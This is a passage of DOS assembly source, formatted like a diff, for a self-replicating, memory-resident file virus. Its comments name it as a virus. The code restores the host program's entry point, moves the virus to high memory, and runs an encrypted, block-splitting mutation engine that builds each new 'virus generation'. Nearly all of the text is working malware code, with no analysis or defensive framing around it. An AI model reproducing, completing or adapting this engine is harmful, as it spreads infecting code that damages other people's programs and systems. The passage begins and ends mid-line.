; AX = offset of block + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + sub ax,4000h ; Subtract offset of next virus ge... + mov [bx],ax ; Store 16-bit immediate + + dec cx ; Decrease counter + jnz data_ref_loo ; Not zero? Jump to data_ref_loo + nop + nop + nop + + jmp restore_code +restore_code: + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... + add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_ip] ; Save initial IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+origin_code] ; SI = offset of origin_code + + mov ax,cs:[si] ; AX = first two bytes of original... + mov cs:[100h],ax ; Store first two bytes of origina... + + mov al,cs:[si+02h] ; AL = last byte of original code ... + mov cs:[100h+02h],al ; Store last byte of original code... + + jmp move_virus + + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... + add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+incorrect_ip] ; Save incorrect IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+origin_code] ; SI = offset of origin_code + + mov ax,cs:[si] ; AX = first two bytes of original... + mov cs:[100h],ax ; Store first two bytes of origina... + + mov al,cs:[si+02h] ; AL = last byte of original code ... + mov cs:[100h+02h],al ; Store last byte of original code... + + jmp move_virus +move_virus: + xor ax,ax ; Zero AX + mov ds,ax ; DS = segment of DOS communicatio... + + cmp byte ptr ds:[501h],10h + jne move_virus_ ; Already resident? Jump to move_v... + + jmp virus_exit +move_virus_: + mov byte ptr ds:[501h],10h + + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + sub ax,4000h ; Subtract offset of next virus ge... + mov [bp+vir_exit_off],ax + + mov cx,ds:[0eh] ; CX = length of virus + mov [bp+virus_length],cx + + mov si,4000h ; SI = offset of next virus genera... + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + mov cl,04h ; Divide by paragraphs + shr di,cl ; DI = length of next virus genera... + inc di ; Increase length of next virus ge... + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + sub bx,di ; Subtract length of next virus ge... + + dec bx ; Decrease new size in paragraphs + dec bx ; Decrease new size in paragraphs + + cmp bx,di ; Insufficient memory? + jae resize_mem_ ; Above or equal? Jump to resize_mem_ + + jmp virus_exit +resize_mem_: + mov ah,4ah ; Resize memory block + int 21h + jnc allocat_mem_ ; No error? Jump to allocat_mem_ + + jmp virus_exit +allocat_mem_: + mov bx,di ; BX = number of paragraphs to all... + mov ah,48h ; Allocate memory + int 21h + jc virus_exit ; Error? Jump to virus_exit + nop + nop + nop + + push ax ; Save AX at stack + dec ax ; AX = segment of current Memory C... + mov es,ax ; ES = segment of current Memory C... + mov word ptr es:[01h],08h + pop es ; Load ES from stack (AX) + + mov cx,[bp+virus_length] + xor si,si ; Zero SI + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + push es ; Save ES at stack + push word ptr [bp+vir_exit_off] + + mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... + mov ah,byte ptr [bp+sliding_key] + + retf ; Return far +terminate: + mov ax,4c00h ; Terminate with return code + int 21h + +get_rnd_num proc near ; Get 16-bit random number + push cx ; Save CX at stack + in al,40h ; AL = 8-bit random number + mov ah,al ; AH = 8-bit random number + in al,40h ; AL = 8-bit random number + + xor ax,es:[01h] ; AX = 16-bit random number + + mov cl,ah ; CL = high-order byte of 16-bit r... + rol ax,cl ; AX = 16-bit random number + + mov es:[01h],ax ; Store 16-bit random number + pop cx ; Load CX from stack + + ret ; Return + endp + +rnd_in_range proc near ; Random number within range + or bp,bp ; Zero BP? + jz zero_range ; Zero? Jump to zero_range + nop + nop + nop + + push dx ; Save DX at stack + call get_rnd_num + + xor dx,dx ; Zero DX + div bp ; DX = random number within range + + xchg ax,dx ; AX = random number within range + pop dx ; Load DX from stack + + ret ; Return +zero_range: + xor ax,ax ; AX = random number within range + + ret ; Return + endp + +decrypt_byte proc near ; Decrypt byte of table + mov [bp+ah_],ah ; Store AH + + mov ax,si ; AX = offset within table + sub ax,bp ; Subtract delta offset from offse... + sub ax,offset tmc_table ; Subtract offset of tmc_table fro... + + mul word ptr [bp+sliding_key] + add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... + + xor al,[si] ; AL = byte of decrypted table + + mov ah,[bp+ah_] ; AH = stored AH + + inc si ; Increase offset within table + + ret ; Return + endp + +decrypt_id proc near ; Decrypt block identification in ... + call decrypt_byte + mov ah,al ; AL = byte of decrypted table + + call decrypt_byte + xchg al,ah ; AL = byte of decrypted table + + ret ; Return + endp +virus_exit: + pop es ; Load ES from stack + + mov ah,49h ; Free memory + int 21h + pop bx ; Load BX from stack + + pop ax ; Load AX from stack + mov ds,ax ; DS = segment of PSP for current ... + mov es,ax ; DS = segment of PSP for current ... + + mov ah,4ah ; Resize memory block + int 21h + + lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 + + pop ax ; Load AX from stack (initial IP) + mov cs:[bx+01h],ax ; Store initial IP + + pop ax ; Load AX from stack (initial CS ...) + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + pop ax ; Load AX from stack (initial SP) + pop ss ; Load SS from stack (initial SS ...) + + mov sp,ax ; SP = stack pointer + + jmp jmp_imm32 + +jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory +ah_ db 00h ; Accumulator register (high-orde...) +probability dw 32h ; Probability +crypt_key db 00h ; 8-bit encryption/decryption key +sliding_key dw 00h ; 8-bit sliding encryption/decrypt... +executa_stat db 00h ; Executable status +origin_code db 11000011b,02h dup(00h) +initial_cs dw 0fff0h ; Initial CS relative to start of ... +initial_ss dw 0fff0h ; Initial SS relative to start of ... +initial_ip dw 100h ; Initial IP +incorrect_ip dw 100h ; Incorrect IP +initial_sp dw 0fffeh ; Initial SP +new_mcb_size dw 1000h ; New size in paragraphs +mcb_size dw 0ffffh ; Size of memory block in paragraphs +mcb_size_ dw 00h ; Size of memory block in paragraphs +program_seg dw 00h ; Segment of PSP for current process +virus_length dw 00h ; Length of virus +vir_exit_off dw 00h ; Offset of virus_exit +table_begin: +first_table: +tmc_table db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 00h ; Block identification of tmc_table + db 03h ; Three bytes instruction + + mov bp,1234h ; BP = delta offset + + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 02h ; Two bytes instruction + + mov ax,ds ; AX = segment of PSP for current ... + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store segment of PSP for current... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of current Memory C... + + db 03h ; Three bytes instruction + + mov ax,ds:[03h] ; AX = size of memory block in par... + + db 03h ; Three bytes instruction + + cmp ax,1900h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store size of memory block in p... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 01h ; One byte instruction + + dec bx ; BX = number of paragraphs to all... + + db 04h ; Four bytes instruction + + cmp bx,0c00h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of allocated memory + + db 07h ; Seven bytes instruction + + mov es:[01h],0deadh ; Store 16-bit random number + + db 07h ; Seven bytes instruction + + mov word ptr es:[0ch],00h + + db 07h ; Seven bytes instruction + + mov es:[04h],1000h ; Store offset of block information + + db 07h ; Seven bytes instruction + + mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... + + db 07h ; Seven bytes instruction + + mov es:[08h],3000h ; Store offset of data information + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov bx,4000h ; BX = offset of next virus genera... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc + db 11101111b ; End of block +initial_tmc_ db 11101110b ; Beginning of block + dw 0fa0h ; Block identification of initial_tmc_ + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +tmc_ini_loo db 11101110b ; Beginning of block + dw 0bb8h ; Block identification of tmc_ini_... + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of block or instruct... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + or al,al ; End of table? + + db 01110100b+10000000b ; Zero? Jump to calc_blocks_ + dw 0bbch ; Pointer to calc_blocks_ + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? Jump to exam_blo__ + dw 0bb9h ; Pointer to exam_blo__ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... + dw 0bb8h ; Pointer to tmc_ini_loo + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo__ db 11101110b ; Beginning of block + dw 0bb9h ; Block identification of exam_blo__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110101b+10000000b ; Not equal? Jump to exam_blo___ + dw 0bbah ; Pointer to exam_blo___ + db 02h ; Two bytes instruction + + mov al,00h ; Don't add anything to offset wit... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo___ db 11101110b ; Beginning of block + dw 0bbah ; Block identification of exam_blo___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? Jump to next_byte_ + dw 0bbbh ; Pointer to next_byte_ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset of block identification + + db 01h ; One byte instruction + + dec ax ; AX = offset of block within table + + db 01h ; One byte instruction + + stosw ; Store offset of block within table + + db 03h ; Three bytes instruction + + mov ax,0ffffh ; Block is still in one part + + db 01h ; One byte instruction + + stosw ; Store block identification + + db 03h ; Three bytes instruction + + mov ax,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +next_byte_ db 11101110b ; Beginning of block + dw 0bbbh ; Block identification of next_byte_ + db 02h ; Two bytes instruction + + mov al,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +calc_blocks_ db 11101110b ; Beginning of block + dw 0bbch ; Block identification of calc_blo... + db 03h ; Three bytes instruction + + lea ax,[di-10h] ; AX = number of blocks multiplied... + + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 04h ; Four bytes instruction + + mov es:[0ah],ax ; Store number of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; End of table + + db 01h ; One byte instruction + + stosw ; Store end of table + + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc0h ; Pointer to exam_bl + db 11101111b ; End of block +split_bloc db 11101110b ; Beginning of block + dw 0bbdh ; Block identification of split_bloc + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 05h ; Five bytes instruction + + mov bp,es:[0ah] ; BP = number of blocks + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 03h ; Three bytes instruction + + add ax,10h ; Add ten to random number + + db 02h ; Two bytes instruction + + mov di,ax ; DI = random offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101111b ; End of block +exam_nxt_bl_ db 11101110b ; Beginning of block + dw 0bbeh ; Block identification of exam_nxt... + db 03h ; Three bytes instruction + + add di,04h ; DI = offset of next offset withi... + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of next block within... + + db 02h ; Two bytes instruction + + or si,si ; End of table? + + db 01110101b+10000000b ; Not zero? Jump to exam_blo____ + dw 0bbfh ; Pointer to exam_blo____ + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbfh ; Pointer to exam_blo____ + db 11101111b ; End of block +exam_blo____ db 11101110b ; Beginning of block + dw 0bbfh ; Block identification of exam_blo... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to exam_bl + dw 0bc0h ; Pointer to exam_bl + db 02h ; Two bytes instruction + + cmp di,ax ; End of table of blocks? + + db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcah ; Pointer to exam_tbl_in + db 11101111b ; End of block +exam_bl db 11101110b ; Beginning of block + dw 0bc0h ; Block identification of exam_bl + db 04h ; Four bytes instruction + + mov ax,es:[di+02h] ; AX = block information + + db 03h ; Three bytes instruction + + cmp ax,0ffffh ; Block is still in one part? + + db 01110100b+10000000b ; Equal? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,ax ; DI = offset of end of first part... + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 01h ; One byte instruction + + stosb ; Store JMP imm16 + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 02h ; Two bytes instruction + + sub ax,di ; Subtract offset of end of first ... + + db 01h ; One byte instruction + + stosw ; Store 16-bit immediate + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_bl_ db 11101110b ; Beginning of block + dw 0bc1h ; Block identification of exam_bl_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110100b+10000000b ; Equal? Jump to end_of_bloc + dw 0bc9h ; Pointer to end_of_bloc + db 02h ; Two bytes instruction + + cmp al,10h ; Data; CALL; JMP; Data reference...? + + db 01110111b+10000000b ; Above? Jump to exam_bl__ + dw 0bc2h ; Pointer to exam_bl__ + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 04h ; Four bytes instruction + + mov bp,[bp+1234h] ; BP = probability + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 02h ; Two bytes instruction + + or ax,ax ; Split up block? + + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110100b+10000000b ; Zero? Jump to split_bloc_ + dw 0bc8h ; Pointer to split_bloc_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc2h ; Pointer to exam_bl__ + db 11101111b ; End of block +exam_bl__ db 11101110b ; Beginning of block + dw 0bc2h ; Block identification of exam_bl__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110100b+10000000b ; Equal? Jump to end_of_bloc + dw 0bc9h ; Pointer to end_of_bloc + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? Jump to exam_data_ + dw 0bc4h ; Pointer to exam_data_ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to sto_inst... + dw 0bc3h ; Pointer to sto_instruc + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc3h ; Pointer to sto_instruc + db 11101111b ; End of block +sto_instruc db 11101110b ; Beginning of block + dw 0bc3h ; Block identification of sto_inst... + db 02h ; Two bytes instruction + + xor cx,cx ; Zero CX + + db 02h ; Two bytes instruction + + mov cl,al ; CL = length of instruction + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,bx ; DI = offset within next virus ge... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0beah ; Pointer to sto_ins_loo + db 11101111b ; End of block +sto_ins_loo db 11101110b ; Beginning of block + dw 0beah ; Block identification of store_op... + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + stosb ; Store byte of instruction + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo + dw 0beah ; Pointer to sto_ins_loo + db 02h ; Two bytes instruction + + mov bx,di ; BX = offset within next virus ge... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_data_ db 11101110b ; Beginning of block + dw 0bc4h ; Block identification of exam_data_ + db 02h ; Two bytes instruction + + cmp al,11101101b ; Data reference? + + db 01110101b+10000000b ; Not equal? Jump to exam_bl___ + dw 0bc5h ; Pointer to exam_bl___ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[08h] ; DI = offset within data information + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus g... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[08h],di ; Store offset within data informa... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_bl___ db 11101110b ; Beginning of block + dw 0bc5h ; Block identification of exam_bl___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ + dw 0bc7h ; Pointer to sto_call_jm_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[04h] ; DI = offset within block informa... + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus ge... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[04h],di ; Store offset within block inform... + + db 03h ; Three bytes instruction + + cmp ax,4c5h ; Block identification of tmc_table_? + + db 01110101b+10000000b ; Not equal? Jump to exam_messag + dw 0bc6h ; Pointer to exam_messag + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 02h ; Two bytes instruction + + mov di,bx ; DI = offset within next virus ge... + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(code_end-first_table) + + db 02h ; Two bytes instruction + + rep movsb ; Move table to top of memory + + db 02h ; Two bytes instruction + + mov bx,di ; BX = offset within next virus ge... + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +exam_messag db 11101110b ; Beginning of block + dw 0bc6h ; Block identification of exam_mes... + db 03h ; Three bytes instruction + + cmp ax,2328h ; Block identification of message? + + db 01110101b+10000000b ; Not equal? Jump to exam_probab + dw 0bedh ; Pointer to exam_probab + db 03h ; Three bytes instruction + + mov ax,14h ; Probability of including message + + db 04h ; Four bytes instruction + + cmp [bp+1234h],ax ; Include message? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01110011b+10000000b ; Above or equal? Jump to examine_... + dw 0bebh ; Pointer to examine_nex + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of message + + db 02h ; Two bytes instruction + + mov ah,00h ; Zero AH + + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of end of message + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +exam_probab db 11101110b ; Beginning of block + dw 0bedh ; Block identification of exam_pro... + db 03h ; Three bytes instruction + + cmp ax,0bech ; Block identification of probabi...? + + db 01110101b+10000000b ; Not equal? Jump to examine_nex + dw 0bebh ; Pointer to examine_nex + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = probability_ + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01h ; One byte instruction + + dec ax ; Decrease probability + + db 03h ; Three bytes instruction + + cmp ax,05h ; Probability too small? + + db 01110011b+10000000b ; Above or equal? Jump to store_pr... + dw 0bf5h ; Pointer to store_proba + db 03h ; Three bytes instruction + + mov ax,64h ; Reset probability + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bf5h ; Pointer to store_proba + db 11101111b ; End of block +store_proba db 11101110b ; Beginning of block + dw 0bf5h ; Block identification of store_pr... + db 03h ; Three bytes instruction + + mov es:[bx],ax ; Store probability + + db 03h ; Three bytes instruction + + add bx,02h ; Add two to offset within next vi... + + db 03h ; Three bytes instruction + + add si,03h ; SI = offset of beginning of next... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +examine_nex db 11101110b ; Beginning of block + dw 0bebh ; Block identification of examine_... + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc2h ; Pointer to exam_bl__ + db 11101111b ; End of block +sto_call_jm_ db 11101110b ; Beginning of block + dw 0bc7h ; Block identification of sto_call... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus g... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[06h],di ; Store offset within CALL; JMP; J... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 03h ; Three bytes instruction + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + db 03h ; Three bytes instruction + + add bx,03h ; Add three to offset within next ... + + db 02h ; Two bytes instruction + + cmp al,11110000b ; Jump condition? + + db 01110010b+10000000b ; Below? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + inc bx ; Increase offset within next viru... + + db 01h ; One byte instruction + + inc bx ; Increase offset within next viru... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +split_bloc_ db 11101110b ; Beginning of block + dw 0bc8h ; Block identification of split_bloc_ + db 04h ; Four bytes instruction + + mov es:[di+02h],bx ; Store offset within next virus g... + + db 03h ; Three bytes instruction + + add bx,03h ; Add three to offset within next ... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc9h ; Pointer to end_of_bloc + db 11101111b ; End of block +end_of_bloc db 11101110b ; Beginning of block + dw 0bc9h ; Block identification of end_of_b... + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 03h ; Three bytes instruction + + mov es:[di],si ; Store offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbdh ; Pointer to split_bloc + db 11101111b ; End of block +exam_tbl_in db 11101110b ; Beginning of block + dw 0bcah ; Block identification of exam_tbl... + db 06h ; Six bytes instruction + + cmp word ptr es:[0ch],00h + + db 01110101b+10000000b ; End of second table? Jump to cor... + dw 0fa1h ; Pointer to correc_i16 + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 05h ; Five bytes instruction + + mov es:[0ch],bx ; Store offset within next virus g... + + db 04h ; Four bytes instruction + + add si,(second_table-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc_ + db 11101111b ; End of block +correc_i16 db 11101110b ; Beginning of block + dw 0fa1h ; Block identification of correc_i16 + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (ES) + + db 04h ; Four bytes instruction + + sub bx,4000h ; Subtract offset of next virus ge... + + db 04h ; Four bytes instruction + + mov ds:[0eh],bx ; Store length of virus + + db 03h ; Three bytes instruction + + mov si,2000h ; SI = offset of CALL; JMP; Jcc im... + + db 04h ; Four bytes instruction + + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of CALL imm16; JMP... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of CALL imm16; JMP... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcbh ; Pointer to jmp_call_lo + db 11101111b ; End of block +jmp_call_lo db 11101110b ; Beginning of block + dw 0bcbh ; Block identification of jmp_call... + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push cx ; Save CX at 